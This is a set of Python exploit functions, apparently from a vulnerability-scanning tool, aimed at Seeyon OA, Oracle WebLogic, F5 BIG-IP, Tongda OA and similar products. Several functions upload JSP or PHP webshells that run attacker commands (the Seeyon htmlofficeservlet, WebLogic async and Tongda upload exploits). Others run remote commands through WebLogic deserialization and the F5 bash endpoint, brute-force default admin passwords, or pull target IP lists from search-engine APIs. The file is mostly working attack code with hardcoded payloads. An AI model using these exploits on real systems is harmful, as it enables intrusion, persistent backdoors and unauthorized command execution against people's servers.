def poc(url): # url = "www.example.org/default.html?ct=32&op=92&item=98" # --> http://www.example.org if url[:4] != "http": url = "http://" + url o = urlparse(url) url = o.scheme + "://" + o.netloc headers = { "User-Agent":get_random_ua() } # shell_name can modify it yourself shell_name="config_db1.jsp" shell_url = url + "/seeyon/" + shell_name try: # just prevent being attacked res = request.get(shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False) if res.status_code == 200 and ":-)" in res.text: return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami' except: pass shell_name = "..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\" + shell_name # def_shell content can modufy iy youself def_shell = """<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("fuckxxxx".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>""" def_shell = def_shell.encode() base_header = "REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkZUFENXlSUUh3TG9pcVJqaWRnNjYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo=" payload_head_len = 283 + len(f_base64encode(shell_name)) payload_shell_len = len(def_shell) payload_shell = def_shell + bytes(hashlib.md5(def_shell).hexdigest(), 'utf-8') payload_shell_name = f_base64encode(shell_name) payload = bytes(base64.b64decode(base_header).decode().replace('355', str(payload_head_len)).replace('666', str( payload_shell_len)).replace('qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdeAD5yRQHwLoiqRjidg66', payload_shell_name), 'utf-8') + payload_shell try: request.post(url=url + "/seeyon/htmlofficeservlet", data=payload, headers=headers, timeout=5, allow_redirects=False, verify=False) res = request.get(url=shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False).text except: return False if ":-)" in res: return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami' else: return False
def linux_check_2(url, webshell_path): linux_payload_2 = r"""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action> <wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell2.jsp</string> </void> </array> <void method="start"/></void> </work:WorkContext> </soapenv:Header> <soapenv:Body> <asy:onAsyncDelivery/> </soapenv:Body></soapenv:Envelope>""" try: attack_url = url + '/_async/AsyncResponseService' request.post(url=attack_url, data=linux_payload_2, headers=post_headers, timeout=5, verify=False) jsp_path = url + '/bea_wls_internal/webshell2.jsp' time.sleep(1) r = request.get(url=jsp_path, headers=get_headers, timeout=5, verify=False) if r.status_code == 200 and r.text == 'weblogic_2019_48814': webshell_path.append("{}?pwd=123&cmd=whoami".format(jsp_path)) else: pass # print("第二种方式失败") except Exception as e: pass
def get_token(self): # Please access https://www.zoomeye.org/api/doc#login data = { 'username': self.username, 'password': self.password } data_encoded = json.dumps(data) # dumps 将 python 对象转换成 json 字符串 res = request.post('https://api.zoomeye.org/user/login', data=data_encoded) if res and res.status_code == 200 and 'access_token' in res.text: res_decoded = json.loads(res.text) self.token = res_decoded['access_token'] return self.token return False
def fast_check_1(url,attach_path): url_path=url+'/admin/index/login.html' passwd=["123456","admin","admin123","admin123456"] for password in passwd: post_data={ "username":"******", "password":password } try: req=request.post(url=url_path,data=post_data,headers=post_headers,timeout=5, verify=False) if req.status_code==200 and "登录成功" in req.text: attach_path.append(url_path+"---账号:admin"+"密码:"+password) else: pass except Exception as e: pass
def poc(url): headers = { "Content-Type": "text/xml;charset=UTF-8", "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" } payload = "/wls-wsat/CoordinatorPortType" post_data = ''' <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <object class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/sh</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>whoami</string> </void> </array> <void method="start"/> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> ''' vulnurl = url + payload try: req = request.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) if req.status_code == 500 and r"java.lang.ProcessBuilder" in req.text: return vulnurl else: return False except: return False
def poc(url): headers = { 'Content-Type': 'application/x-www-form-urlencoded', } target = get_standard_url(url) for url_payload in (url_payload1, url_payload2, url_payload3, url_payload4): url = target + url_payload for data_payload in (data_payload1, data_payload2, data_payload3): try: res = request.post(url, data=data_payload, headers=headers, timeout=5, allow_redirects=False) if res.status_code == 200 and ";</script>" not in res.text\ and "Login.jsp" not in res.text and "Error" not in res.text: return url + "\tpayload:" + data_payload except: pass return False
def poc(url): headers = { "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", "Content-Type":"application/x-www-form-urlencoded" } payload = "/console/j_security_check" passwd = ["weblogic", "weblogic1", "weblogic12", "weblogic123"] vulnurl = url + payload for pwd in passwd: post_data = { "j_username":"******", "j_password":pwd } try: req = request.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False, allow_redirects=False) if req.status_code == 302 and r"console" in req.text and r"LoginForm.jsp" not in req.text: return vulnurl + json.dumps(post_data, indent=4) else: return False except: return False
def poc(url): headers = { 'Content-Type': 'application/x-www-form-urlencoded', } target = get_standard_url(url) url = target + url_payload for payload in (payload1, payload2): try: res = request.post(url, data=payload, headers=headers, timeout=5, allow_redirects=False) if "系统提醒工作流" in res.text and "403" not in res.text: if "@@version" in payload: return target + "\tmssql" else: return target + "\toracle" except: pass return False
def get_ip(query, page): ''' Return ips and total amount when doing query ''' data = {"query": query, "page": page, "fields": ["ip", "protocols"]} try: res = request.post(API_URL + "/search/ipv4", data=json.dumps(data), auth=(UID, SECRET)) results = res.json() if res.status_code != 200: colorprint.red("error occurred: %s" % results["error"]) sys.exit(1) # add result in some specific form for result in results["results"]: conf.target.add(result["ip"]) except Exception as e: colorprint.red(e)
def poc(url): url = get_standard_url(url) path = url + "/mgmt/tm/util/bash" headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0', 'Content-Type': 'application/json', 'X-F5-Auth-Token': '', 'Authorization': 'Basic YWRtaW46QVNhc1M=' } data = json.dumps({'command': 'run', 'utilCmdArgs': '-c id'}) try: r = request.post(url=path, data=data, headers=headers, verify=False, timeout=5) if r.status_code == 200 and 'commandResult' in r.text: return True except Exception as e: print(e) return False
def poc(url): try: url1 = get_standard_url(url) + '/ispirit/im/upload.php' headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "multipart/form-data; boundary=---------------------------27723940316706158781839860668" } data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"f.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\n$command=$_POST['f'];\r\n$wsh = new COM('WScript.shell');\r\n$exec = $wsh->exec(\"cmd /c \".$command);\r\n$stdout = $exec->StdOut();\r\n$stroutput = $stdout->ReadAll();\r\necho $stroutput;\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n" result = request.post(url1, headers=headers, data=data, timeout=5, verify=False) name = "".join(re.findall("2003_(.+?)\|", result.text)) url2 = get_standard_url(url) + '/ispirit/interface/gateway.php' headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded" } data = { "json": "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" % (name), "f": "echo fffhhh" } result = request.post(url2, headers=headers, data=data, timeout=5, verify=False) if result.status_code == 200 and 'fffhhh' in result.text: # print("[+] Remote code execution vulnerability exists at the target address") return get_standard_url(url) else: return False except: pass